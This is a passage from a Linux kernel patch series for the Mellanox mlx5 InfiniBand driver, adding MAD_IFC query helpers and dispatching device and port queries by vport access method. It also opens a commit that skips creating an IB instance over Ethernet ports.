IB_SMP_ATTR_NODE_INFO; + + err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, 1, NULL, NULL, in_mad, + out_mad); + + kfree(in_mad); + return err; +} + +int mlx5_query_mad_ifc_system_image_guid(struct ib_device *ibdev, + __be64 *sys_image_guid) +{ + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!out_mad) + return -ENOMEM; + + err = mlx5_query_mad_ifc_smp_attr_node_info(ibdev, out_mad); + if (err) + goto out; + + memcpy(sys_image_guid, out_mad->data + 4, 8); + +out: + kfree(out_mad); + + return err; +} + +int mlx5_query_mad_ifc_max_pkeys(struct ib_device *ibdev, + u16 *max_pkeys) +{ + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!out_mad) + return -ENOMEM; + + err = mlx5_query_mad_ifc_smp_attr_node_info(ibdev, out_mad); + if (err) + goto out; + + *max_pkeys = be16_to_cpup((__be16 *)(out_mad->data + 28)); + +out: + kfree(out_mad); + + return err; +} + +int mlx5_query_mad_ifc_vendor_id(struct ib_device *ibdev, + u32 *vendor_id) +{ + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!out_mad) + return -ENOMEM; + + err = mlx5_query_mad_ifc_smp_attr_node_info(ibdev, out_mad); + if (err) + goto out; + + *vendor_id = be32_to_cpup((__be32 *)(out_mad->data + 36)) & 0xffff; + +out: + kfree(out_mad); + + return err; +} + +int mlx5_query_mad_ifc_node_desc(struct mlx5_ib_dev *dev, char *node_desc) +{ + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), 
GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_NODE_DESC; + + err = mlx5_MAD_IFC(dev, 1, 1, 1, NULL, NULL, in_mad, out_mad); + if (err) + goto out; + + memcpy(node_desc, out_mad->data, 64); +out: + kfree(in_mad); + kfree(out_mad); + return err; +} + +int mlx5_query_mad_ifc_node_guid(struct mlx5_ib_dev *dev, __be64 *node_guid) +{ + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_NODE_INFO; + + err = mlx5_MAD_IFC(dev, 1, 1, 1, NULL, NULL, in_mad, out_mad); + if (err) + goto out; + + memcpy(node_guid, out_mad->data + 12, 8); +out: + kfree(in_mad); + kfree(out_mad); + return err; +} + +int mlx5_query_mad_ifc_pkey(struct ib_device *ibdev, u8 port, u16 index, + u16 *pkey) +{ + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_PKEY_TABLE; + in_mad->attr_mod = cpu_to_be32(index / 32); + + err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, + out_mad); + if (err) + goto out; + + *pkey = be16_to_cpu(((__be16 *)out_mad->data)[index % 32]); + +out: + kfree(in_mad); + kfree(out_mad); + return err; +} + +int mlx5_query_mad_ifc_gids(struct ib_device *ibdev, u8 port, int index, + union ib_gid *gid) +{ + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_PORT_INFO; + in_mad->attr_mod = cpu_to_be32(port); + + err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, + out_mad); + if (err) + goto out; + + memcpy(gid->raw, out_mad->data + 8, 8); + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_GUID_INFO; + in_mad->attr_mod = cpu_to_be32(index / 8); + + err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, + out_mad); + if (err) + goto out; + + memcpy(gid->raw + 8, out_mad->data + (index % 8) * 8, 8); + +out: + kfree(in_mad); + kfree(out_mad); + return err; +} + +int mlx5_query_mad_ifc_port(struct ib_device *ibdev, u8 port, + struct ib_port_attr *props) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + struct ib_smp *in_mad = NULL; + struct ib_smp *out_mad = NULL; + int ext_active_speed; + int err = -ENOMEM; + + if (port < 1 || port > MLX5_CAP_GEN(mdev, num_ports)) { + mlx5_ib_warn(dev, "invalid port number %d\n", port); + return -EINVAL; + } + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); + if (!in_mad || !out_mad) + goto out; + + memset(props, 0, sizeof(*props)); + + init_query_mad(in_mad); + in_mad->attr_id = IB_SMP_ATTR_PORT_INFO; + in_mad->attr_mod = cpu_to_be32(port); + + err = mlx5_MAD_IFC(dev, 1, 1, port, NULL, NULL, in_mad, out_mad); + if (err) { + mlx5_ib_warn(dev, "err %d\n", err); + goto out; + } + + props->lid = be16_to_cpup((__be16 *)(out_mad->data + 16)); + props->lmc = out_mad->data[34] & 0x7; + props->sm_lid = be16_to_cpup((__be16 *)(out_mad->data 
+ 18)); + props->sm_sl = out_mad->data[36] & 0xf; + props->state = out_mad->data[32] & 0xf; + props->phys_state = out_mad->data[33] >> 4; + props->port_cap_flags = be32_to_cpup((__be32 *)(out_mad->data + 20)); + props->gid_tbl_len = out_mad->data[50]; + props->max_msg_sz = 1 << MLX5_CAP_GEN(mdev, log_max_msg); + props->pkey_tbl_len = mdev->port_caps[port - 1].pkey_table_len; + props->bad_pkey_cntr = be16_to_cpup((__be16 *)(out_mad->data + 46)); + props->qkey_viol_cntr = be16_to_cpup((__be16 *)(out_mad->data + 48)); + props->active_width = out_mad->data[31] & 0xf; + props->active_speed = out_mad->data[35] >> 4; + props->max_mtu = out_mad->data[41] & 0xf; + props->active_mtu = out_mad->data[36] >> 4; + props->subnet_timeout = out_mad->data[51] & 0x1f; + props->max_vl_num = out_mad->data[37] >> 4; + props->init_type_reply = out_mad->data[41] >> 4; + + /* Check if extended speeds (EDR/FDR/...) are supported */ + if (props->port_cap_flags & IB_PORT_EXTENDED_SPEEDS_SUP) { + ext_active_speed = out_mad->data[62] >> 4; + + switch (ext_active_speed) { + case 1: + props->active_speed = 16; /* FDR */ + break; + case 2: + props->active_speed = 32; /* EDR */ + break; + } + } + + /* If reported active speed is QDR, check if is FDR-10 */ + if (props->active_speed == 4) { + if (mdev->port_caps[port - 1].ext_port_cap & + MLX_EXT_PORT_CAP_FLAG_EXTENDED_PORT_INFO) { + init_query_mad(in_mad); + in_mad->attr_id = MLX5_ATTR_EXTENDED_PORT_INFO; + in_mad->attr_mod = cpu_to_be32(port); + + err = mlx5_MAD_IFC(dev, 1, 1, port, + NULL, NULL, in_mad, out_mad); + if (err) + goto out; + + /* Checking LinkSpeedActive for FDR-10 */ + if (out_mad->data[15] & 0x1) + props->active_speed = 8; + } + } + +out: + kfree(in_mad); + kfree(out_mad); + + return err; +} diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c index 9075649f30fc..a117e27b424a 100644 --- a/drivers/infiniband/hw/mlx5/main.c +++ b/drivers/infiniband/hw/mlx5/main.c @@ -40,6 +40,7 @@ #include #include #include +#include #include #include #include "user.h" @@ -62,30 +63,168 @@ static char mlx5_version[] = DRIVER_NAME ": Mellanox Connect-IB Infiniband driver v" DRIVER_VERSION " (" DRIVER_RELDATE ")\n"; +static enum rdma_link_layer +mlx5_ib_port_link_layer(struct ib_device *device) +{ + struct mlx5_ib_dev *dev = to_mdev(device); + + switch (MLX5_CAP_GEN(dev->mdev, port_type)) { + case MLX5_CAP_PORT_TYPE_IB: + return IB_LINK_LAYER_INFINIBAND; + case MLX5_CAP_PORT_TYPE_ETH: + return IB_LINK_LAYER_ETHERNET; + default: + return IB_LINK_LAYER_UNSPECIFIED; + } +} + +static int mlx5_use_mad_ifc(struct mlx5_ib_dev *dev) +{ + return !dev->mdev->issi; +} + +enum { + MLX5_VPORT_ACCESS_METHOD_MAD, + MLX5_VPORT_ACCESS_METHOD_HCA, + MLX5_VPORT_ACCESS_METHOD_NIC, +}; + +static int mlx5_get_vport_access_method(struct ib_device *ibdev) +{ + if (mlx5_use_mad_ifc(to_mdev(ibdev))) + return MLX5_VPORT_ACCESS_METHOD_MAD; + + if (mlx5_ib_port_link_layer(ibdev) == + IB_LINK_LAYER_ETHERNET) + return MLX5_VPORT_ACCESS_METHOD_NIC; + + return MLX5_VPORT_ACCESS_METHOD_HCA; +} + +static int mlx5_query_system_image_guid(struct ib_device *ibdev, + __be64 *sys_image_guid) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + u64 tmp; + int err; + + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_system_image_guid(ibdev, + sys_image_guid); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + err = mlx5_query_hca_vport_system_image_guid(mdev, &tmp); + if (!err) + *sys_image_guid = 
cpu_to_be64(tmp); + return err; + + default: + return -EINVAL; + } +} + +static int mlx5_query_max_pkeys(struct ib_device *ibdev, + u16 *max_pkeys) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_max_pkeys(ibdev, max_pkeys); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + case MLX5_VPORT_ACCESS_METHOD_NIC: + *max_pkeys = mlx5_to_sw_pkey_sz(MLX5_CAP_GEN(mdev, + pkey_table_size)); + return 0; + + default: + return -EINVAL; + } +} + +static int mlx5_query_vendor_id(struct ib_device *ibdev, + u32 *vendor_id) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_vendor_id(ibdev, vendor_id); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + case MLX5_VPORT_ACCESS_METHOD_NIC: + return mlx5_core_query_vendor_id(dev->mdev, vendor_id); + + default: + return -EINVAL; + } +} + +static int mlx5_query_node_guid(struct mlx5_ib_dev *dev, + __be64 *node_guid) +{ + u64 tmp; + int err; + + switch (mlx5_get_vport_access_method(&dev->ib_dev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_node_guid(dev, node_guid); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + err = mlx5_query_hca_vport_node_guid(dev->mdev, &tmp); + if (!err) + *node_guid = cpu_to_be64(tmp); + return err; + + default: + return -EINVAL; + } +} + +struct mlx5_reg_node_desc { + u8 desc[64]; +}; + +static int mlx5_query_node_desc(struct mlx5_ib_dev *dev, char *node_desc) +{ + struct mlx5_reg_node_desc in; + + if (mlx5_use_mad_ifc(dev)) + return mlx5_query_mad_ifc_node_desc(dev, node_desc); + + memset(&in, 0, sizeof(in)); + + return mlx5_core_access_reg(dev->mdev, &in, sizeof(in), node_desc, + sizeof(struct mlx5_reg_node_desc), + MLX5_REG_NODE_DESC, 0, 0); +} + static int mlx5_ib_query_device(struct ib_device *ibdev, struct ib_device_attr *props) { struct mlx5_ib_dev *dev = to_mdev(ibdev); struct mlx5_core_dev *mdev = dev->mdev; - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; int err = -ENOMEM; int max_rq_sg; int max_sq_sg; - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) - goto out; - - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_NODE_INFO; + memset(props, 0, sizeof(*props)); + err = mlx5_query_system_image_guid(ibdev, + &props->sys_image_guid); + if (err) + return err; - err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, 1, NULL, NULL, in_mad, out_mad); + err = mlx5_query_max_pkeys(ibdev, &props->max_pkeys); if (err) - goto out; + return err; - memset(props, 0, sizeof(*props)); + err = mlx5_query_vendor_id(ibdev, &props->vendor_id); + if (err) + return err; props->fw_ver = ((u64)fw_rev_maj(dev->mdev) << 32) | (fw_rev_min(dev->mdev) << 16) | @@ -117,11 +256,8 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, if (MLX5_CAP_GEN(mdev, block_lb_mc)) props->device_cap_flags |= IB_DEVICE_BLOCK_MULTICAST_LOOPBACK; - props->vendor_id = be32_to_cpup((__be32 *)(out_mad->data + 36)) & - 0xffffff; - props->vendor_part_id = be16_to_cpup((__be16 *)(out_mad->data + 30)); - props->hw_ver = be32_to_cpup((__be32 *)(out_mad->data + 32)); - memcpy(&props->sys_image_guid, out_mad->data + 4, 8); + props->vendor_part_id = mdev->pdev->device; + props->hw_ver = mdev->pdev->revision; props->max_mr_size = ~0ull; props->page_size_cap = 1ull << MLX5_CAP_GEN(mdev, log_pg_sz); @@ -147,7 +283,6 @@ static int 
mlx5_ib_query_device(struct ib_device *ibdev, props->max_fast_reg_page_list_len = (unsigned int)-1; props->atomic_cap = IB_ATOMIC_NONE; props->masked_atomic_cap = IB_ATOMIC_NONE; - props->max_pkeys = be16_to_cpup((__be16 *)(out_mad->data + 28)); props->max_mcast_grp = 1 << MLX5_CAP_GEN(mdev, log_max_mcg); props->max_mcast_qp_attach = MLX5_CAP_GEN(mdev, max_qp_mcg); props->max_total_mcast_qp_attach = props->max_mcast_qp_attach * @@ -160,175 +295,232 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, props->odp_caps = dev->odp_caps; #endif -out: - kfree(in_mad); - kfree(out_mad); - - return err; + return 0; } -int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, - struct ib_port_attr *props) +enum mlx5_ib_width { + MLX5_IB_WIDTH_1X = 1 << 0, + MLX5_IB_WIDTH_2X = 1 << 1, + MLX5_IB_WIDTH_4X = 1 << 2, + MLX5_IB_WIDTH_8X = 1 << 3, + MLX5_IB_WIDTH_12X = 1 << 4 +}; + +static int translate_active_width(struct ib_device *ibdev, u8 active_width, + u8 *ib_width) { struct mlx5_ib_dev *dev = to_mdev(ibdev); - struct mlx5_core_dev *mdev = dev->mdev; - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; - int ext_active_speed; - int err = -ENOMEM; + int err = 0; + + if (active_width & MLX5_IB_WIDTH_1X) { + *ib_width = IB_WIDTH_1X; + } else if (active_width & MLX5_IB_WIDTH_2X) { + mlx5_ib_dbg(dev, "active_width %d is not supported by IB spec\n", + (int)active_width); + err = -EINVAL; + } else if (active_width & MLX5_IB_WIDTH_4X) { + *ib_width = IB_WIDTH_4X; + } else if (active_width & MLX5_IB_WIDTH_8X) { + *ib_width = IB_WIDTH_8X; + } else if (active_width & MLX5_IB_WIDTH_12X) { + *ib_width = IB_WIDTH_12X; + } else { + mlx5_ib_dbg(dev, "Invalid active_width %d\n", + (int)active_width); + err = -EINVAL; + } - if (port < 1 || port > MLX5_CAP_GEN(mdev, num_ports)) { - mlx5_ib_warn(dev, "invalid port number %d\n", port); - return -EINVAL; + return err; +} + +static int mlx5_mtu_to_ib_mtu(int mtu) +{ + switch (mtu) { + case 256: return 1; + case 512: return 2; + case 1024: return 3; + case 2048: return 4; + case 4096: return 5; + default: + pr_warn("invalid mtu\n"); + return -1; } +} - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) - goto out; +enum ib_max_vl_num { + __IB_MAX_VL_0 = 1, + __IB_MAX_VL_0_1 = 2, + __IB_MAX_VL_0_3 = 3, + __IB_MAX_VL_0_7 = 4, + __IB_MAX_VL_0_14 = 5, +}; - memset(props, 0, sizeof(*props)); +enum mlx5_vl_hw_cap { + MLX5_VL_HW_0 = 1, + MLX5_VL_HW_0_1 = 2, + MLX5_VL_HW_0_2 = 3, + MLX5_VL_HW_0_3 = 4, + MLX5_VL_HW_0_4 = 5, + MLX5_VL_HW_0_5 = 6, + MLX5_VL_HW_0_6 = 7, + MLX5_VL_HW_0_7 = 8, + MLX5_VL_HW_0_14 = 15 +}; - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_PORT_INFO; - in_mad->attr_mod = cpu_to_be32(port); +static int translate_max_vl_num(struct ib_device *ibdev, u8 vl_hw_cap, + u8 *max_vl_num) +{ + switch (vl_hw_cap) { + case MLX5_VL_HW_0: + *max_vl_num = __IB_MAX_VL_0; + break; + case MLX5_VL_HW_0_1: + *max_vl_num = __IB_MAX_VL_0_1; + break; + case MLX5_VL_HW_0_3: + *max_vl_num = __IB_MAX_VL_0_3; + break; + case MLX5_VL_HW_0_7: + *max_vl_num = __IB_MAX_VL_0_7; + break; + case MLX5_VL_HW_0_14: + *max_vl_num = __IB_MAX_VL_0_14; + break; - err = mlx5_MAD_IFC(dev, 1, 1, port, NULL, NULL, in_mad, out_mad); - if (err) { - mlx5_ib_warn(dev, "err %d\n", err); - goto out; + default: + return -EINVAL; } + return 0; +} - props->lid = be16_to_cpup((__be16 *)(out_mad->data + 16)); - props->lmc = out_mad->data[34] & 0x7; - props->sm_lid = be16_to_cpup((__be16 *)(out_mad->data + 18)); - 
props->sm_sl = out_mad->data[36] & 0xf; - props->state = out_mad->data[32] & 0xf; - props->phys_state = out_mad->data[33] >> 4; - props->port_cap_flags = be32_to_cpup((__be32 *)(out_mad->data + 20)); - props->gid_tbl_len = out_mad->data[50]; - props->max_msg_sz = 1 << MLX5_CAP_GEN(mdev, log_max_msg); - props->pkey_tbl_len = mdev->port_caps[port - 1].pkey_table_len; - props->bad_pkey_cntr = be16_to_cpup((__be16 *)(out_mad->data + 46)); - props->qkey_viol_cntr = be16_to_cpup((__be16 *)(out_mad->data + 48)); - props->active_width = out_mad->data[31] & 0xf; - props->active_speed = out_mad->data[35] >> 4; - props->max_mtu = out_mad->data[41] & 0xf; - props->active_mtu = out_mad->data[36] >> 4; - props->subnet_timeout = out_mad->data[51] & 0x1f; - props->max_vl_num = out_mad->data[37] >> 4; - props->init_type_reply = out_mad->data[41] >> 4; - - /* Check if extended speeds (EDR/FDR/...) are supported */ - if (props->port_cap_flags & IB_PORT_EXTENDED_SPEEDS_SUP) { - ext_active_speed = out_mad->data[62] >> 4; - - switch (ext_active_speed) { - case 1: - props->active_speed = 16; /* FDR */ - break; - case 2: - props->active_speed = 32; /* EDR */ - break; - } - } +static int mlx5_query_hca_port(struct ib_device *ibdev, u8 port, + struct ib_port_attr *props) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + struct mlx5_hca_vport_context *rep; + int max_mtu; + int oper_mtu; + int err; + u8 ib_link_width_oper; + u8 vl_hw_cap; - /* If reported active speed is QDR, check if is FDR-10 */ - if (props->active_speed == 4) { - if (mdev->port_caps[port - 1].ext_port_cap & - MLX_EXT_PORT_CAP_FLAG_EXTENDED_PORT_INFO) { - init_query_mad(in_mad); - in_mad->attr_id = MLX5_ATTR_EXTENDED_PORT_INFO; - in_mad->attr_mod = cpu_to_be32(port); - - err = mlx5_MAD_IFC(dev, 1, 1, port, - NULL, NULL, in_mad, out_mad); - if (err) - goto out; - - /* Checking LinkSpeedActive for FDR-10 */ - if (out_mad->data[15] & 0x1) - props->active_speed = 8; - } + rep = kzalloc(sizeof(*rep), GFP_KERNEL); + if (!rep) { + err = -ENOMEM; + goto out; } -out: - kfree(in_mad); - kfree(out_mad); + memset(props, 0, sizeof(*props)); - return err; -} + err = mlx5_query_hca_vport_context(mdev, 0, port, 0, rep); + if (err) + goto out; -static int mlx5_ib_query_gid(struct ib_device *ibdev, u8 port, int index, - union ib_gid *gid) -{ - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; - int err = -ENOMEM; + props->lid = rep->lid; + props->lmc = rep->lmc; + props->sm_lid = rep->sm_lid; + props->sm_sl = rep->sm_sl; + props->state = rep->vport_state; + props->phys_state = rep->port_physical_state; + props->port_cap_flags = rep->cap_mask1; + props->gid_tbl_len = mlx5_get_gid_table_len(MLX5_CAP_GEN(mdev, gid_table_size)); + props->max_msg_sz = 1 << MLX5_CAP_GEN(mdev, log_max_msg); + props->pkey_tbl_len = mlx5_to_sw_pkey_sz(MLX5_CAP_GEN(mdev, pkey_table_size)); + props->bad_pkey_cntr = rep->pkey_violation_counter; + props->qkey_viol_cntr = rep->qkey_violation_counter; + props->subnet_timeout = rep->subnet_timeout; + props->init_type_reply = rep->init_type_reply; - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) + err = mlx5_query_port_link_width_oper(mdev, &ib_link_width_oper, port); + if (err) goto out; - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_PORT_INFO; - in_mad->attr_mod = cpu_to_be32(port); - - err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, out_mad); + err = translate_active_width(ibdev, 
ib_link_width_oper, + &props->active_width); + if (err) + goto out; + err = mlx5_query_port_proto_oper(mdev, &props->active_speed, MLX5_PTYS_IB, + port); if (err) goto out; - memcpy(gid->raw, out_mad->data + 8, 8); + err = mlx5_query_port_max_mtu(mdev, &max_mtu, port); + if (err) + goto out; - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_GUID_INFO; - in_mad->attr_mod = cpu_to_be32(index / 8); + props->max_mtu = mlx5_mtu_to_ib_mtu(max_mtu); - err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, out_mad); + err = mlx5_query_port_oper_mtu(mdev, &oper_mtu, port); if (err) goto out; - memcpy(gid->raw + 8, out_mad->data + (index % 8) * 8, 8); + props->active_mtu = mlx5_mtu_to_ib_mtu(oper_mtu); + + err = mlx5_query_port_vl_hw_cap(mdev, &vl_hw_cap, port); + if (err) + goto out; + err = translate_max_vl_num(ibdev, vl_hw_cap, + &props->max_vl_num); out: - kfree(in_mad); - kfree(out_mad); + kfree(rep); return err; } -static int mlx5_ib_query_pkey(struct ib_device *ibdev, u8 port, u16 index, - u16 *pkey) +int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, + struct ib_port_attr *props) { - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; - int err = -ENOMEM; + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_port(ibdev, port, props); - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) - goto out; + case MLX5_VPORT_ACCESS_METHOD_HCA: + return mlx5_query_hca_port(ibdev, port, props); - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_PKEY_TABLE; - in_mad->attr_mod = cpu_to_be32(index / 32); + default: + return -EINVAL; + } +} - err = mlx5_MAD_IFC(to_mdev(ibdev), 1, 1, port, NULL, NULL, in_mad, out_mad); - if (err) - goto out; +static int mlx5_ib_query_gid(struct ib_device *ibdev, u8 port, int index, + union ib_gid *gid) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; - *pkey = be16_to_cpu(((__be16 *)out_mad->data)[index % 32]); + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_gids(ibdev, port, index, gid); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + return mlx5_query_hca_vport_gid(mdev, 0, port, 0, index, gid); + + default: + return -EINVAL; + } -out: - kfree(in_mad); - kfree(out_mad); - return err; } -struct mlx5_reg_node_desc { - u8 desc[64]; -}; +static int mlx5_ib_query_pkey(struct ib_device *ibdev, u8 port, u16 index, + u16 *pkey) +{ + struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; + + switch (mlx5_get_vport_access_method(ibdev)) { + case MLX5_VPORT_ACCESS_METHOD_MAD: + return mlx5_query_mad_ifc_pkey(ibdev, port, index, pkey); + + case MLX5_VPORT_ACCESS_METHOD_HCA: + case MLX5_VPORT_ACCESS_METHOD_NIC: + return mlx5_query_hca_vport_pkey(mdev, 0, port, 0, index, + pkey); + default: + return -EINVAL; + } +} static int mlx5_ib_modify_device(struct ib_device *ibdev, int mask, struct ib_device_modify *props) @@ -727,37 +919,15 @@ static int mlx5_ib_mcg_detach(struct ib_qp *ibqp, union ib_gid *gid, u16 lid) static int init_node_data(struct mlx5_ib_dev *dev) { - struct ib_smp *in_mad = NULL; - struct ib_smp *out_mad = NULL; - int err = -ENOMEM; - - in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); - out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); - if (!in_mad || !out_mad) - goto out; - - init_query_mad(in_mad); - in_mad->attr_id = IB_SMP_ATTR_NODE_DESC; - - err = mlx5_MAD_IFC(dev, 1, 
1, 1, NULL, NULL, in_mad, out_mad); - if (err) - goto out; - - memcpy(dev->ib_dev.node_desc, out_mad->data, 64); - - in_mad->attr_id = IB_SMP_ATTR_NODE_INFO; + int err; - err = mlx5_MAD_IFC(dev, 1, 1, 1, NULL, NULL, in_mad, out_mad); + err = mlx5_query_node_desc(dev, dev->ib_dev.node_desc); if (err) - goto out; + return err; - dev->mdev->rev_id = be32_to_cpup((__be32 *)(out_mad->data + 32)); - memcpy(&dev->ib_dev.node_guid, out_mad->data + 12, 8); + dev->mdev->rev_id = dev->mdev->pdev->revision; -out: - kfree(in_mad); - kfree(out_mad); - return err; + return mlx5_query_node_guid(dev, &dev->ib_dev.node_guid); } static ssize_t show_fw_pages(struct device *device, struct device_attribute *attr, @@ -1195,7 +1365,8 @@ static void *mlx5_ib_add(struct mlx5_core_dev *mdev) if (err) goto err_dealloc; - get_ext_port_caps(dev); + if (mlx5_use_mad_ifc(dev)) + get_ext_port_caps(dev); MLX5_INIT_DOORBELL_LOCK(&dev->uar_lock); diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h index 0c441add0464..f731b2592a36 100644 --- a/drivers/infiniband/hw/mlx5/mlx5_ib.h +++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h @@ -594,6 +594,22 @@ struct ib_xrcd *mlx5_ib_alloc_xrcd(struct ib_device *ibdev, int mlx5_ib_dealloc_xrcd(struct ib_xrcd *xrcd); int mlx5_ib_get_buf_offset(u64 addr, int page_shift, u32 *offset); int mlx5_query_ext_port_caps(struct mlx5_ib_dev *dev, u8 port); +int mlx5_query_mad_ifc_smp_attr_node_info(struct ib_device *ibdev, + struct ib_smp *out_mad); +int mlx5_query_mad_ifc_system_image_guid(struct ib_device *ibdev, + __be64 *sys_image_guid); +int mlx5_query_mad_ifc_max_pkeys(struct ib_device *ibdev, + u16 *max_pkeys); +int mlx5_query_mad_ifc_vendor_id(struct ib_device *ibdev, + u32 *vendor_id); +int mlx5_query_mad_ifc_node_desc(struct mlx5_ib_dev *dev, char *node_desc); +int mlx5_query_mad_ifc_node_guid(struct mlx5_ib_dev *dev, __be64 *node_guid); +int mlx5_query_mad_ifc_pkey(struct ib_device *ibdev, u8 port, u16 index, + u16 *pkey); +int mlx5_query_mad_ifc_gids(struct ib_device *ibdev, u8 port, int index, + union ib_gid *gid); +int mlx5_query_mad_ifc_port(struct ib_device *ibdev, u8 port, + struct ib_port_attr *props); int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, struct ib_port_attr *props); int mlx5_ib_init_fmr(struct mlx5_ib_dev *dev); From 647241ea10db87ed0448853fa510177dd89a7a63 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:47 +0300 Subject: [PATCH 718/872] IB/mlx5: Don't create IB instance over Ethernet ports Since we still don't have RoCE support in mlx5, avoid creating IB driver instance over Ethernet ports. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/main.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c index a117e27b424a..f82969257332 100644 --- a/drivers/infiniband/hw/mlx5/main.c +++ b/drivers/infiniband/hw/mlx5/main.c @@ -1353,6 +1353,10 @@ static void *mlx5_ib_add(struct mlx5_core_dev *mdev) int err; int i; + /* don't create IB instance over Eth ports, no RoCE yet! 
